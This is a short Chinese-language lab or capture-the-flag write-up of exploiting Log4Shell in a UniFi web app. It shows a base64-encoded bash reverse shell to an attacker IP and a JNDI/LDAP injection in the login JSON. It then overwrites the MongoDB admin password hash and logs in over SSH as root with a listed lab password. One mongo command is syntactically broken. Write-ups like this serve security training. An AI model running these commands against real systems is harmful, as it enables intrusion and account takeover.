db_nmap -sV 10.129.147.254
發現 8080 是個網站,打開
10.129.147.254:8080
UniFi 搜一下 :UniFi 漏洞
找到了相關漏洞:CVE-2021-44228
嘗試利用。。
監聽 389 端口
sudo tcpdump -i tun0 port 389
執行命令
將此命令用 base64 加密
echo 'bash -c bash -i >& /dev/tcp/10.10.16.20/12123 0>&1' | base64
burpsuite 抓包裡添加這串內容
{
"username":"admin",
"password":"admin",
"remember":"${jndi:ldap://10.10.16.20/test}",
"strict"
}
${jndi:ldap://Tun0 IP Address:1389/o=tomcat} 
sudo nc -lvnp 12123
監聽端口
在此 send 發包
拿到 shell
用 script /dev/null -c bash 來使用
得到資料庫信息 mongo 資料庫
ps aux | grep mongo 
透過查詢,得到以下信息
mongo --port 27117 ace --eval "db.admin.find().forEach(printjson)" 
"_id" : ObjectId("61ce278f46e0fb0012d47ee4"),
"name" : "administrator",
"email" : "[email protected]",
"x_shadow" : "$6$Ry6Vdbse$8enMR5Znxoo.WfCMd/Xk65GwuQEPx1M.QP8/qHiQV0PvUc3uHuonK4WcTQFN1CRk3GwQaquyVwCVq8iQgPTt4.",
看到密碼為
顯示用 sha-512 加密後的密碼
mkpasswd -m sha-512 你設定的密碼
mongo --port 27117 ace --eval 'db.admin.update({"_id"("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"SHA-512 Hash Generated"}})'
修改前 Adminstrator 的 x_shadow 值:
"_id" : ObjectId("61ce278f46e0fb0012d47ee4"),
"name" : "administrator",
"email" : "[email protected]",
"x_shadow" : "$6$Ry6Vdbse$8enMR5Znxoo.WfCMd/Xk65GwuQEPx1M.QP8/qHiQV0PvUc3uHuonK4WcTQFN1CRk3GwQaquyVwCVq8iQgPTt4.",
修改後:
"_id" : ObjectId("61ce278f46e0fb0012d47ee4"),
"name" : "administrator",
"email" : "[email protected]",
"x_shadow" : "$6$N5j/rR78cHLEi42V$itMyy1nFi5HmeqfR9aV75vp2TXOnCIyN4zyVOW8NVlwU2H7QTqCA.aYuJY/svipLLCBsY9r5FE9eOFs9kjIHW/",
此時,Adminstrator 的密碼已經修改為 test1234
左側設置裡面最下面,發現
sshKeys
登錄 ssh
帳號:root
密碼:NotACrackablePassword4U2022
拿到 shell
